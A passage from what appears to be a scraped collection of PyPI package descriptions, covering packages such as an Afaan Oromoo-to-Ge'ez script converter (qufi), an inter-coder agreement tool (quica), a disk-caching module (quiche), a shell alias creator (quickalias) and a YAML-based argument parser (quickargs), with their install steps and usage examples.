\u12a5\u1295\u12f5\u1295\u127d\u120d \u12ed\u1205 \u00ab\u120b\u12ed\u1265\u1228\u122a\u00bb \u1270\u12d8\u130b\u1305\u1277\u120d\u1362 \u1240\u1325\u120e \u12eb\u1209\u1275\u1295 \u1218\u1218\u122a\u12eb\u12ce\u127d \u12ed\u1218\u120d\u12a8\u1271\u1362\u12a0\u132b\u132b\u1295\u12ed\u1205\u1295 \u00ab\u120b\u12ed\u1265\u1228\u122a\u00bb \u12ae\u121d\u1352\u12cd\u1270\u122e \u120b\u12ed \u1208\u1218\u132b\u1295\u1366$ pip install qufi-script\u12a0\u1201\u1295 \u12a0\u1295\u121e\u12ad\u122dpython\n\nfrom qufi import QubeFidel \n\nqube = QubeFidel()\nprint(qube.convert(\"Ashamaa!\"))\u12cd\u1324\u1275\u12a0\u1238\u121b!\u12a8\u12da\u1205 \u1260\u1273\u127d \u1219\u1209 \u121b\u1265\u122a\u122a\u12eb\u12cd \u1260\u12a0\u134b\u1295 \u12a6\u122e\u121e \u1240\u122d\u1267\u120dSagaleewwan Dheeraa fi GabaabaaEgaa akkumma beekamu Afaan Oromoo keessatti dheerachuunii fi gabaabbachuun fi jabinnii fi laafinni sagalee hiika jechaa irratti garaagarummaa guddaa ni fida. Haaluma kanaan afaan oromoon qubee gi'iziitin haala gaariin akka hin barreeffamne danqaawwan ta'aa turan keessaa inni guddaan: qubee gi'iz keessati sagaleewwan 7 yommuu jiraatan, afaan oromoo keessatti immoo sagaleewwan 10tu jiru. Egaa nutis kana hubachuun, qubeewwan amma argaman irrati tuqaa tokko mataa isaaniirra kaa'un sagaleewwan hanqatan kun itti dabalamaniiruu. Kana irratti hundaa'uunis sagaleewwan kunniin bakka 3^^tti^^ qoodamu: sagalee dheeraa, sagalee gabaabaa fi al-sagalee jedhamu.Sagaleewwan GabaabaaQubee jahaaffaan(\u1233\u12f5\u1235) fi arfaffaa(\u122b\u12d5\u1265) alatti warri jiran Sagaleewwan gabaaba jedhamun beekamu. Baay'inni isaanis shan(5)ni dha.Fakkeenya sagaleewwan gabaabaa maati qubee\u1218QubeeSagalee\u1218ma\u1219mu\u121ami\u121cme\u121emoSagaleewwan dheeraaSagaleewwan kunnin immoo, qubeewwan sagalee gabaabaa duraan jiran irrati tuq-tokko mataa ofirratti maxxanfachuunii kan uumamaniifii qubee arfaffaa(\u122b\u12d5\u1265) dha. Baa'inni isaanis shan(5)ni dha.Fakkeenya sagaleewwan dheeraa maatii\u1218QubeeSagalee\u1219\u135emuu\u121a\u135emii\u121bmaa\u121c\u135emee\u121e\u135emooHubachiisa: Qubeen arfaffaa ofumasaa sagalee dheeraa waan ta'eef, yoomiyyu taanaan tuq-tokko mataa ofii isaarratti hin maxxanfatu.Al-SagaleeQubeewwan kunnin immoo sagalee of danda'aa mataa isaanii kan hin qabnee ta'anii, warra qubeewwan jahaaffaa(\u1233\u12f5\u1235) ta'anidha. Faayidaan isaanis: jechoota jabeessuu, cufa birsagaa irratti, jechota irra buutaa qaban keessattii fi akka maxxantootaatti tajaajiluudha.Jechoota Gabaabaafi DheeraaEgaa akkuma beekamu jechoonni hundinuu barsaga mataa mataa isaani ta'e ni qabu. Birsagoonni kunis sagalee of danda'oo ni ta'u; Kanaafuu sagaloota kana gara qubee gi'iz duraan dubbanetti jijjiiruuf salphaa nuuf ta'a.Fakkeenya 1: jechilagajedhu birsagoota lama qaba: la fi ga. birsagoonni kunis sagaleewwan of danda'oo waaan ta'aaniif gara sagaloota\u1208fi\u1308tti jijjiiramu. Kanaafuu jechilagajedhu\u1208\u1308ta'a jechuudha.Fakkeenya 2: jechilaagaajedhu birsagoota lama qaba: laa fi gaa. ammas birsagoonni kunis sagaleewwan of danda'oo waaan ta'aaniif gara sagaloota\u120bfi\u130btti jijjiiramu. Kanaafuu jechilaagaajedhu\u120b\u130bta'aFakkeenya jechoota gabaabaa fi dheeraa muraasaGabaabaaDheeraaHori[\u1206\u122a]Horii[\u1206\u122a\u135e]Mala[\u1218\u1208]Malaa[\u1218\u120b]Gara[\u1308\u1228]Garaa[\u1308\u122b], Gaara[\u130b\u1228]Lafa[\u1208\u1348]Laafaa[\u120b\u134b]Ana[\u12a0\u1290]Aanaa[\u12a3\u1293]Jechoota irra butaaJechoota irra butaa jijiiruf duraan dursinee jechicha gara birsagaatti addaan qoodna, achiis sagaleewwan of danda'oo fi alsagaleewwan jechichaa qubee gi'iiziin bakka buufna.Fakkeenyaaf jechaFardajedhu kana gara birsagaatti haa qoqqoodnu:Farfidata'a. Kunis\u1348\u122dfi\u12f0ta'a. Kanaafu jechiFardajedhu\u1348\u122d\u12f0ta'a jechuudha.Jechoota irra butaa tokko tokkoFarda\u1348\u122d\u12f0Ilma\u12a2\u120d\u1218Jilba\u1302\u120d\u1260Harka\u1200\u122d\u12a8Harma\u1200\u122d\u1218Arba\u12a0\u122d\u1260Sagalewwan JabaaJecha keenya duraan dursinee gara birsagaatti qoqqooduun, achiin birsaga arganne sana qubeewwan sagaleewwan ofdanda'oo qabanii fi al-sagaleewwaniin bakka buusuudha.Fakkeenyaaf jechaJimmaajedhu osoo fudhannee birsagoota lama qaba:Jim(\u1302\u121dfimaadha. Kanaafuu jechi kun yemmuu jijjiiramu\u1302\u121d\u121bta'a.Haalli dubbisaa jechoota jabaa: qubee jahaaffaa(\u1233\u12f5\u1235) liqimsuunii fi qubee isa itti aanu jabeessinee dubbifna. Fakkeenyaaf jechaTokkojedhu yemmuuu jijjiirru\u1276\u12ad\u12aeta'a. Haalli dubbisa isaa kunisTokkojedhamee dubbifama malee, sagalee addaan kutuun:Tok-kojedhamee hin dubbifamu!Birsagaaan alatti, jecha tokko keessatti maatiwwan qubee tokkoo qubeen jahaffaa(\u1233\u12f5\u1235) fi kan biraa walduraa duubaan walitti aananii yoo dhufan, qubeen jahaaffaatti(\u1233\u12f5\u1235) itti aanee argamu sun jabeeffamee dubbifama.Jechoota jabaa fi laafaa tokko tokkoLaafaaJabaaJimaa[\u1302\u121b]Jimmaa[\u1302\u121d\u1361\u121b]Waloo[\u12c8\u120e\u135e]Walloo[\u12c8\u120d\u1361\u120e\u135e]Hare[\u1200\u122c]Harre[\u1200\u122d\u1361\u122c]Badaa[\u1260\u12f3]Baddaa[\u1260\u12f5\u1361\u12f3]Qale[\u1240\u120c]Qalle[\u1240\u120d\u1361\u120c]Maxxantoota Muraasa-n-\u1295-tti-\u1275\u1272-f-\u134dol-\u12a6\u120d--oota\u12a6\u135e\u1270python \nfrom qufi import QubeFidel \n\nqube = QubeFidel()\n\nprint(qube.convert(\"Caalaan kaleessa mana barumsaa deeme.\"))\n\nprint(qube.convert(\"Baacaan sa'aa bite.\"))\n\nprint(qube.convert(\"Gaariin ijoollee fe'e.\"))\u12cd\u1324\u1275\u132b\u120b\u1295 \u12a8\u120c\u135e\u1235\u1230 \u1218\u1290 \u1260\u1229\u121d\u1233 \u12f4\u135e\u121c\u1362\n\n\u1263\u132b\u1295 \u1230\u12a3 \u1262\u1274\u1362\n\n\u130b\u122a\u135e\u1295 \u12a2\u1306\u135e\u120d\u120c\u135e \u134c\u12a4\u1362Jechoota hin jiiramneJechoota akka hin jijjiiramne gochuuf, jechicha `` keessa galchuun akka hin jijjiiramne gochuun ni danda'ama.python\nfrom qufi import QubeFidel\n\nqube = QubeFidel()\n\nprint(qube.convert(\"`Caalaan` deeme.\"))\n\nprimt(qube.convert(\"`Jechi kun hin jijiiramu!`\"))\u12c8\u1324\u1275Caalaan \u12f4\u135e\u121c\u1362\n\nJechi kun hin jijiiramu!Qubeewwan dachaaCha\u1298Dha\u12f8Nya\u1298Pha\u1330Sha\u1238Tsa\u1340Zya\u12d8\u12a8\u1273\u127d \u1260\u121d\u1235\u1209 \u120b\u12ed \u12eb\u1209\u1275 \u134a\u12f0\u120b\u1275\u1363 \u1275\u12ad\u12ad\u1208\u129b\u12cd \u12e8\u12a0\u134b\u1295 \u12a6\u122e\u121e \u12e8 Dha \u134a\u12f0\u120b\u1275 \u1293\u1278\u12cd\u1362Qubeewwan suuraa armaan oliitti argaman, maatii qubee \"Dha\" isa sirrii dha.Sirna Tuqaalee.\u1362:\u1365,\u1363;\u1364......??!!\u1241\u1264\u134a\u12f0\u120d\u1275\u122d\u1309\u121dQore\u1246\u122c\u1348\u1270\u1290Qoree\u1246\u122c\u135e\u12a5\u123e\u1205Qorre\u1246\u122d\u122c\u1240\u12d8\u1240\u12d8Qorree\u1246\u122d\u122c\u135e\u1348\u1275\u1290\u1295Qooree\u1246\u135e\u122c\u135e\u12f0\u122d\u1246Qoorree\u1246\u135e\u122d\u122c\u135e\u12f0\u1228\u1245\u1295Namootni hundinuu birmaduu ta'anii mirgaa fi ulfinaanis wal-qixxee ta'anii dhalatan. Sammuu fi qalbii ittiin yaadan waan uumamaan kennameef, hafuura obbolommaatiin wal-wajjin jiraachuu qabu.\u1290\u121e\u135e\u1275\u1292 \u1201\u1295\u12f2\u1291\u135e \u1262\u122d\u1218\u12f1\u135e \u1270\u12a0\u1292\u135e \u121a\u122d\u130b \u134a \u12a1\u120d\u134a\u1293\u1292\u1235 \u12c8\u120d-\u1242\u1325\u1324\u135e \u1270\u12a0\u1292\u135e \u12f8\u1208\u1270\u1295\u1362 \u1230\u121d\u1219\u135e \u134a \u1240\u120d\u1262\u135e \u12a2\u1275\u1272\u135e\u1295 \u12eb\u12f0\u1295 \u12cb\u1295 \u12a1\u135e\u1218\u121b\u1295 \u12ac\u1295\u1290\u121c\u135e\u134d\u1363 \u1200\u1349\u135e\u1228 \u12a6\u1265\u1266\u120e\u121d\u121b\u1272\u135e\u1295 \u12c8\u120d-\u12c8\u1305\u1302\u1295 \u1302\u122b\u1279\u135e \u1240\u1261\u1362\u12e8\u134a\u12f0\u120d \u1308\u1260\u1273AUUUIIIAAEEE\u00d8OOO\u1200\u1201\u1201\u135e\u1202\u1202\u135e\u1203\u1204\u1204\u135e\u1205\u1206\u1206\u135ehahuhuuhihiihaaheheehhohoo\u1208\u1209\u1209\u135e\u120a\u120a\u135e\u120b\u120c\u120c\u135e\u120d\u120e\u120e\u135elaluluuliliilaaleleelloloo\u1218\u1219\u1219\u135e\u121a\u121a\u121b\u121c\u121c\u135e\u121d\u121e\u121e\u135emamumuumimiimaamemeemmomoo\u1228\u1229\u1229\u135e\u122a\u122a\u135e\u122b\u122c\u122c\u135e\u122d\u122e\u122e\u135eraruruuririiraarereerroroo\u1230\u1231\u1231\u135e\u1232\u1232\u135e\u1233\u1234\u1234\u135e\u1235\u1236\u1236\u135esasusuusisiisaaseseessosoo\u1238\u1239\u1239\u135e\u123a\u123a\u135e\u123b\u123c\u123c\u135e\u123d\u123e\u123e\u135eshashushuushishiishaashesheeshshoshoo\u1240\u1241\u1241\u135e\u1242\u1242\u135e\u1243\u1244\u1244\u135e\u1245\u1246\u1246\u135eqaququuqiqiiqaaqeqeeqqoqoo\u1260\u1261\u1261\u135e\u1262\u1262\u135e\u1263\u1264\u1264\u135e\u1265\u1266\u1266\u135ebabubuubibiibaabeveebboboo\u1268\u1269\u1269\u135e\u126a\u126a\u135e\u126b\u126c\u126c\u135e\u126d\u126e\u126e\u135evavuvuuviviivaaveveevvovoo\u1270\u1271\u1271\u135e\u1272\u1272\u135e\u1273\u1274\u1274\u135e\u1275\u1276\u1276\u135etatutuutitiitaateteettotoo\u1278\u1279\u1279\u135e\u127a\u127a\u135e\u127b\u127c\u127c\u135e\u127d\u127e\u127e\u135echachuchuuchichiichaachecheechchochoo\u1290\u1291\u1291\u135e\u1292\u1292\u135e\u1293\u1294\u1294\u135e\u1295\u1296\u1296\u135enanunuuniniinaaneneennonoo\u1298\u1299\u1299\u135e\u129a\u129a\u135e\u129b\u129c\u129c\u135e\u129d\u129e\u129e\u135enyanyunyuunyinyiinyaanyenyeenynyonyoo\u12a0\u12a1\u12a1\u135e\u135e\u12a2\u12a2\u135e\u12a3\u12a4\u12a4\u135e\u12a5\u12a6\u12a6\u135e(')a(')u(')uu(')i(')ii(')aa(')e(')ee-(')o(')oo\u12a8\u12a9\u12a9\u135e\u12aa\u12aa\u135e\u12ab\u12ac\u12ac\u135e\u12ad\u12ae\u12ae\u135ekakukuukikiikaakekeekkokoo\u12c8\u12c9\u12c9\u135e\u12ca\u12ca\u135e\u12cb\u12cc\u12cc\u135e\u12cd\u12ce\u12ce\u135ewawuwuuwiwiiwaaweweewwowoo\u12d8\u12d9\u12d9\u135e\u12da\u12da\u135e\u12db\u12dc\u12dc\u135e\u12dd\u12de\u12de\u135ezazuzuuziziizaazezeezzozoo\u12e0\u12e1\u12e1\u135e\u12e2\u12e2\u135e\u12e3\u12e4\u12e4\u135e\u12e5\u12e6\u12e6\u135ezyazyuzyuuzyizyiizyaazyezyeezyzyozyoo\u12e8\u12e9\u12e9\u135e\u12ea\u12ea\u135e\u12eb\u12ec\u12ec\u135e\u12ed\u12ee\u12ee\u135eyayuyuuyiyiiyaayeyeeyyoyoo\u12f0\u12f1\u12f1\u135e\u12f2\u12f2\u135e\u12f3\u12f4\u12f4\u135e\u12f5\u12f6\u12f6\u135edaduduudidiidaadedeeddodoo\u12f8\uab09\uab09\u135e\uab0a\uab0a\u135e\uab0b\uab0c\uab0c\u135e\uab0d\uab0e\uab0e\u135edhadhudhuudhidhiidhaadhedheedhdhodhoo\u1300\u1301\u1301\u135e\u1302\u1302\u135e\u1303\u1304\u1304\u135e\u1305\u1306\u1306\u135ejajujuujijiijaajejeejjojoo\u1308\u1309\u1309\u135e\u130a\u130a\u135e\u130b\u130c\u130c\u135e\u130d\u130e\u130e\u135egaguguugigiigaagegeeggogoo\u1320\u1321\u1321\u135e\u1322\u1322\u135e\u1323\u1324\u1324\u135e\u1325\u1326\u1326\u135exaxuxuuxixiixaaxexeexxoxoo\u1328\u1329\u1329\u135e\u132a\u132a\u135e\u132b\u132c\u132c\u135e\u132d\u132e\u132e\u135ecacucuuciciicaaceceeccocoo\u1330\u1331\u1331\u135e\u1332\u1332\u135e\u1333\u1334\u1334\u135e\u1335\u1336\u1336\u135ephaphuphuuphiphiiphaaphepheephphophoo\u1340\u1341\u1341\u135e\u1342\u1342\u135e\u1343\u1344\u1344\u135e\u1345\u1346\u1346\u135etsatsutsuutsitsiitsaatsetseetstsotsoo\u1348\u1349\u1349\u135e\u134a\u134a\u135e\u134b\u134c\u134c\u135e\u134d\u134e\u134e\u135efafufuufifiifaafefeeffofoo\u1350\u1351\u1351\u135e\u1352\u1352\u135e\u1353\u1354\u1354\u135e\u1355\u1356\u1356\u135epapupuupipiipaapepeeppopoo"} +{"package": "qufit", "pacakge-description": "\u672c\u6a21\u5757\u5305\u62ec\u4e86\u8d85\u5bfc\u91cf\u5b50\u8ba1\u7b97\u5b9e\u9a8c\u4e2d\u5e38\u7528\u6a21\u578b\u7684\u62df\u5408\u51fd\u6570\u4e0e\u6570\u636e\u5904\u7406\u65b9\u6cd5\u3002\ndataTools\u6a21\u5757\u4e3b\u8981\u5305\u542b\u4e86qubit\u80fd\u8c31\u4e0e\u7535\u538b\u7684\u8f6c\u6362\u51fd\u6570\uff0c\u4ee5\u53ca\u8bfb\u53d6IQ\u4fe1\u53f7\u7684\u4e34\u754c\u5224\u65ad\u65b9\u6cd5\noptimize\u6a21\u5757\u5305\u62ec\u4e86\u5404\u79cd\u5b9e\u9a8c\u8fc7\u7a0b\u7684\u62df\u5408\u51fd\u6570\uff0c\u4ee5\u53ca\u65f6\u9891\u5206\u6790\u65b9\u6cd5\uff0c\u5916\u52a0\u4e00\u90e8\u5206\u6570\u636e\u6e05\u6d17\u65b9\u6cd5\u3002"} +{"package": "quhep", "pacakge-description": "Construct Quantum Neural Network usingTensorflow-quantumorQiskit1. How to runCheckoutpip install quhepquhep_tfq -i data/qml/hmumu_twojet_0719.npy --nqubits 3 --batch-size 4 --training-size 4 --val-size 4 --test-size 4 --epochs 1 --loss mse use_quple"} +{"package": "qui", "pacakge-description": "Bindings for QML part of Qt"} +{"package": "quibble", "pacakge-description": "QuibbleUNDER CONSTRUCTION \ud83d\udea7MORE COMING SOON \ud83d\udd1cSTAY TUNED \ud83d\udcfbWhy Quibble? :thinking:Framework for various optimization tasks.InstallationSimply use the python package installer to getquibble:pipinstallquibblePackage is currently being integrated into PyPI, so please be patient if it is not yet working \ud83d\ude42ExamplesHere, you can find some minimal example to demonstrate the use ofquibble.Non-Linear ProgrammingimportnumpyasnpfromquibbleimportNonLinearProgrammingnlp=NonLinearProgramming(verbose=True)x_1=nlp.add_decision_variable('x_1',lower_bound=-10,upper_bound=10)x_2=nlp.add_decision_variable('x_2',lower_bound=-10,upper_bound=10)x_3=nlp.add_decision_variable('x_3',lower_bound=-1,upper_bound=1)nlp.add_constraint(x_1*x_2**3-np.sin(x_3-x_2/2),lower_bound=-2,upper_bound=2.5)nlp.add_constraint(abs(x_1+x_2+x_3),lower_bound=-2,upper_bound=1)nlp.add_objective(x_1+x_2+x_3)result=nlp.solve(trials=1)"} +{"package": "quibraries", "pacakge-description": "Quibraries is aPythonwrapper for thelibraries.ioAPI which is based onPybraries.\nCurrently the package fully supports the searching functionality, meaning that the full range of available commands\nfromlibraries.iois supported.The full documentation is hosted atRead the Docs.Differences with PybrariesThe main reason of existence of this package is thatPybrariesis notthread-safe.\nFurther, theAPIkey can be provided only as an environment variable, which makes it difficult to change\nduring execution. Additionally, is when a query returns multiple pages, inPybrariesthe iteration has to\nhappen manually and by the user. This is because the returned object is notIterable, thus convenient\n\u201cpythonic\u201d constructs cannot be used. The aforementioned reasons (and their associated pain points) sparked the\ncreation of this project which aims to offer whatPybrariesdoes, but also adding these - to us - important\nfeatures.Key TermsBelow a list of the key terms if provided which is synonymous with thelibraries.ioconcepts.hostA repository host platform. e.g. GitHubownerA repository owner. e.g. pandas-devrepoA repository. e.g. pandasuserA repository user e.g. a GitHub username. e.g. discdiverplatformA package manager platform. e.g. PyPIprojectA package or library distributed by a package manager platform. e.g. pandasIt is important to note that many repositories and projects share the same name. Additionally, many owners and repos\nalso share the same name. Further, many owners are also users.Since this library is a wrapper around functionality that is already provided bylibraries.iothe items\nreturned are dependent on the API response. In normal circumstances, the answer type is defined by the number of\nreturned items. In the case of a single element returned, then it is a dictionary. If the result contains more than\none item, then the result is a list of dictionaries.DocsCheck out the full quibrariesdocumentation.Getting HelpCheck out the quibrariesdocumentation.Check out thelibraries.iodocs.Open an issue onGitHubor tag a question onStack Overflowwith \u201cquibraries\u201d.ContributingContributions are welcome and appreciated! SeeContributing.LicenseThis software package is governed by the terms and conditions of theMIT license"} +{"package": "quic", "pacakge-description": "No description available on PyPI."} +{"package": "quica", "pacakge-description": "Quick Inter Coder Agreement in PythonQuica (Quick Inter Coder Agreement in Python) is a tool to run inter coder agreement pipelines in an easy and effective ways.\nMultiple measures are run and results are collected in a single table than can be easily exported in Latex.\nquica supports binary or multiple coders.Quick Inter Coder Agreement in PythonFree software: MIT licenseDocumentation:https://quica.readthedocs.io.Installationpipinstall-UquicaGet Quick AgreementIf you already have a python dataframe you can run Quica with few liens of code! Let\u2019s assume you have two\ncoders; we will create a pandas dataframe just to show how to use the library. As for now, we support only integer values\nand we still have not included weighting.fromquica.quicaimportQuicaimportpandasaspdcoder_1=[0,1,0,1,0,1]coder_3=[0,1,0,1,0,0]dataframe=pd.DataFrame({\"coder1\":coder_1,\"coder3\":coder_3})quica=Quica(dataframe=dataframe)print(quica.get_results())This is the expected output:Out[1]:scorenameskrippendorff0.685714fleiss0.666667scotts0.657143raw0.833333mace0.426531cohen0.666667It was pretty easy to get all the scores, right? What if we do not have a pandas dataframe? what if we want to directly get\nthe latex table to put into the paper? worry not, my friend: it\u2019s easier done than said!fromquica.measures.irrimport*fromquica.dataset.datasetimportIRRDatasetfromquica.quicaimportQuicacoder_1=[0,1,0,1,0,1]coder_3=[0,1,0,1,0,0]disagreeing_coders=[coder_1,coder_3]disagreeing_dataset=IRRDataset(disagreeing_coders)quica=Quica(disagreeing_dataset)print(quica.get_results())print(quica.get_latex())you should get this in output, note that the latex table requires the booktabs package:Out[1]:scorenameskrippendorff0.685714fleiss0.666667scotts0.657143raw0.833333mace0.426531cohen0.666667Out[2]:\\begin{tabular}{lr}\\toprule{}&score\\\\names&\\\\\n\\midrulekrippendorff&0.685714\\\\fleiss&0.666667\\\\scotts&0.657143\\\\raw&0.833333\\\\mace&0.426531\\\\cohen&0.666667\\\\\n\\bottomrule\\end{tabular}Featuresfromquica.measures.irrimport*fromquica.dataset.datasetimportIRRDatasetfromquica.quicaimportQuicacoder_1=[0,1,0,1,0,1]coder_2=[0,1,0,1,0,1]coder_3=[0,1,0,1,0,0]agreeing_coders=[coder_1,coder_2]agreeing_dataset=IRRDataset(agreeing_coders)disagreeing_coders=[coder_1,coder_3]disagreeing_dataset=IRRDataset(disagreeing_coders)kri=Krippendorff()cohen=CohensK()assertkri.compute_irr(agreeing_dataset)==1assertkri.compute_irr(agreeing_dataset)==1assertcohen.compute_irr(disagreeing_dataset)<1assertcohen.compute_irr(disagreeing_dataset)<1Supported AlgorithmsMACE(Multi-Annotator Competence Estimation)Hovy, D., Berg-Kirkpatrick, T., Vaswani, A., & Hovy, E. (2013, June). Learning whom to trust with MACE. In Proceedings of the 2013 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies (pp. 1120-1130).We define the inter coder agreeement as the average competence of the users.Krippendorff\u2019s AlphaCohens\u2019 KFleiss\u2019 KScotts\u2019 PIRaw Agreement: Standard AccuracyCreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template. Thanks to Pietro Lesci and Dirk Hovy\nfor their implementation of MACE.History0.1.0 (2020-11-08)New API to get the outputFixed test casesExtended documentation on the README file0.1.0 (2020-11-05)First release on PyPI."} +{"package": "quicc", "pacakge-description": "# quicc"} +{"package": "quicfire", "pacakge-description": "QUIC-Fire Python SDK"} +{"package": "quicfire-tools", "pacakge-description": "quicfire-toolsQuick-LinksDocumentation-PyPi PackageWhat is quicfire-tools?quicfire-tools is a Python package that provides a convenient interface for programmatically creating and managing\nQUIC-Fire input file decks and processing QUIC-Fire output files into standard Python array data structures.The goals of quicfire-tools are to:Make it easy to write Python code to work with QUIC-Fire input and output files.Unify code, scripts, and workflows across the QUIC-Fire ecosystem into a single package to support the development of\nnew QUIC-Fire tools and applications.Provide a platform for collaboration among QUIC-Fire developers and users.Installationquicfire-tools can be installed usingpiporconda.pippipinstallquicfire-toolscondaConda support is coming soon!IssuesIf you encounter any issues with the quicfire-tools package, please submit an issue on the quicfire-tools GitHub\nrepositoryissues page."} +{"package": "quiche", "pacakge-description": "Python module for caching the results of functions on disk and/or in memory and\nreusing them as-needed instead of recomputing them all the time.pipinstallquicheshould work, after which:fromquicheimportdep@dep.task((),\"base\")defbase():return7@dep.task((\"base\",),\"plus_one\")defplus_one(base):returnbase+1@dep.task((\"plus_one\",),\"times_two\")deftimes_two(val):returnval*2ts,val=dep.create(\"times_two\")print(\"(7 + 1) * 2 is\",val)should print:(7 + 1) * 2 is 16"} +{"package": "quick", "pacakge-description": "No description available on PyPI."} +{"package": "quick2wire-api", "pacakge-description": "Quick2Wire API"} +{"package": "quick2wire-peque", "pacakge-description": "Quick2Wire API"} +{"package": "quickai", "pacakge-description": "QuickAI is a Python library that makes it extremely easy to experiment with state-of-the-art Machine Learning models.Announcement videohttps://www.youtube.com/watch?v=kK46sJphjIsDemohttps://deepnote.com/project/QuickAI-1r_4zvlyQMa2USJrIvB-kA/%2Fnotebook.ipynbMotivationWhen I started to get into more advanced Machine Learning, I started to see how these famous neural network\narchitectures(such as EfficientNet), were doing amazing things. However, when I tried to implement these architectures\nto problems that I wanted to solve, I realized that it was not super easy to implement and quickly experiment with these\narchitectures. That is where QuickAI came in. It allows for easy experimentation of many model architectures quickly.Dependencies:Tensorflow, PyTorch, Sklearn, Matplotlib, Numpy, and Hugging Face Transformers. You should install TensorFlow and PyTorch following the instructions from their respective websites.Why you should use QuickAIQuickAI can reduce what would take tens of lines of code into 1-2 lines. This makes fast experimentation very easy and\nclean. For example, if you wanted to train EfficientNet on your own dataset, you would have to manually write the data\nloading, preprocessing, model definition and training code, which would be many lines of code. Whereas, with QuickAI,\nall of these steps happens automatically with just 1-2 lines of code.The following models are currently supported:Image ClassificationEfficientNet B0-B7VGG16VGG19DenseNet121DenseNet169DenseNet201Inception ResNet V2Inception V3MobileNetMobileNet V2MobileNet V3 Small & LargeResNet 101ResNet 101 V2ResNet 152ResNet 152 V2ResNet 50ResNet 50 V2XceptionNatural Language ProcessingGPT-NEO 125M(Generation, Inference)GPT-NEO 350M(Generation, Inference)GPT-NEO 1.3B(Generation, Inference)GPT-NEO 2.7B(Generation, Inference)Distill BERT Cased(Q&A, Inference and Fine Tuning)Distill BERT Uncased(Named Entity Recognition, Inference)Distil BART (Summarization, Inference)Distill BERT Uncased(Sentiment Analysis & Text/Token Classification, Inference and Fine Tuning)Object DetectionYOLOV4YOLOV4 TinyInstallationpip install quickAIHow to usePlease see the examples folder for details. For the YOLOV4, you can download weights fromhere. Full documentation is in the wiki section of the repo.Issues/QuestionsIf you encounter any bugs, please open a new issue so they can be corrected. If you have general questions, please use the discussion section.CreditsMost of the code for the YOLO implementations were taken from \"The AI Guy's\"tensorflow-yolov4-tflite&YOLOv4-Cloud-Tutorialrepos. Without this, the YOLO implementation would not be possible. Thank you!"} +{"package": "quickalias", "pacakge-description": "QuickaliasThis python script creates permanent aliases so you don't have to open your shell config fileDependencies:python3Currently Supported Shellsbashzshfishkshtcshohpowershell (Linux)InstallationYou have three ways to install this program.You can install with the pypi package (with pip):pipinstallquickaliasYou can install with the PKGBUILD (for Arch users):gitclonehttps://github.com/dCaples/quickaliascdquickalias\nmakepkg-siOr you can install with make:gitclonehttps://github.com/dCaples/quickaliascdquickalias\nsudomakeinstallUsageCli applicationyou may runquickaliasin interactive mode:This example is using the zsh shell$ quickalias\nEnter alias for command: hello\nEnter the command: echo hello\n\nAdded \"alias hello=\"echo hello\"\" to shell config\nYou can source the new changes with:\n source /home//.zshrcusing flags:This example is using the zsh shell$ quickalias --alias \"hello\" --command \"echo hello\"\n\nAdded \"alias hello=\"echo hello\"\" to shell config\nYou can source the new changes with:\n source /home//.zshrcor using positional arguments:This example is using the zsh shell$ quickalias hello \"echo hello\"\n\nAdded \"alias hello=\"echo hello\"\" to shell config\nYou can source the new changes with:\n source /home//.zshrcFlagsFlagEffect-h--helpDisplay help information-a--aliasProvide the alias for the command-c--commmandProvide the command to be aliasedPython ModuleQuickalias's main functions are avalible in other python programs as a module.An example program using this module:# test.py# Detecting the process calling the program# Importing the moduleimportquickalias# Initalizing the classquickalias=quickalias.QuickAlias()print(quickalias.detect_shell())When running this program from a zsh shell it prints the following:$python3test.py\n/usr/bin/zshThe functions avalible in the module are the following:detect_shell() -> str- Returns the process calling the programget_home_dir() -> str- Returns the home directory of the user calling the functionget_shell_config_file(home: str) -> str- Attempts to determine the config file for a provided shell.generate_alias_command(alias: str, command: str, shell: str) -> any- Take an alias and a command to be aliased and returns an alias command appropriate for the shell.will return a list to be passed to subprocess.run if the shell is fishwrite_alias(alias_command: str, config_file: str) -> str- Intended to write the output ofgenerate_alias_command()to the location provided byget_shell_config_file()ContributingCheck the issues (if there are any), it's a good place to start when you don't know what to do.Fork the repository and create pull requests to this repository.Don\u2019t change the formatting; Dont reformat or otherwise change the formatting of source code or documentation in the repo. Use the same formatting as the rest of the codebase.Make documentation; If adding features or otherwise changing the user experience create documentation regarding the added or changed features.Use space only indentation in all source code files with the sole execption ofMakefile. Do not use tabs or any form of indentation other than spaces. Use 4 space indentation."} +{"package": "quick-anomaly-detector", "pacakge-description": "AnomalyDetectionModelAnomalyDetectionModelsOverviewAnomalyDetectionModelis a python library that includs some simple implementation of an anomaly detection model.For more details, please refer to the document page:Documentpypi page link is here:(https://pypi.org/project/quick-anomaly-detector/)Quick StartInstallationYou can installAnomaly Detection Modelusing pip:pip install quick-anomaly-detectorQuick Start:from quick_anomaly_detector.models import AnomalyGaussianModel\n\n\n# Load your datasets (X_train, X_val, y_val)\nmodel = AnomalyGaussianModel()\n\n# Train the model\nmodel.train(X_train, X_val, y_val)\n\n# Predict anomalies in the validation dataset\nanomalies = model.predict(X_val)"} +{"package": "quickapi", "pacakge-description": "No description available on PyPI."} +{"package": "quickargs", "pacakge-description": "quickargsTakes a YAML config file and builds a parser for command line arguments\naround it. This allows you to easily override default settings by\npassing command line arguments to your program. Supports nested\narguments and auto-enforces parameter types.This config file\u2026input_dir:datalogging:file:output.loglevel:4\u2026 together with this main.py \u2026importyamlimportquickargswithopen(\"config.yaml\")asf:config=yaml.load(f,Loader=quickargs.YAMLArgsLoader)\u2026 will give you this command line interfaceusage: main.py [-h] [--input_dir INPUT_DIR] [--logging.file LOGGING.FILE]\n [--logging.level LOGGING.LEVEL]\n\noptional arguments:\n -h, --help show this help message and exit\n --input_dir INPUT_DIR\n default: data\n --logging.file LOGGING.FILE\n default: output.log\n --logging.level LOGGING.LEVEL\n default: 4Override settings using the command linepython main.py--logging.file=other_log.txtYou get your merged yaml + command line parameters in a convenient dictionary# exact same output format as normal yaml.load would produce\n{'input_dir': 'data', 'logging': {'file': 'other_log.txt', 'level': 4}}The types used in the yaml file are automatically enforcedSetting the log-level to a string instead of an int:python main.py--logging.level=WARNINGusage: main.py [-h] [--input_dir INPUT_DIR] [--logging.file LOGGING.FILE]\n [--logging.level LOGGING.LEVEL]\nmain.py: error: argument --logging.level: invalid int value: 'WARNING'Setting the log-level to the correct type:python main.py--logging.level=0{'input_dir': 'data', 'logging': {'file': 'output.log', 'level': 0}}Installationpip install quickargsUsageLoad the yaml config and parse command line 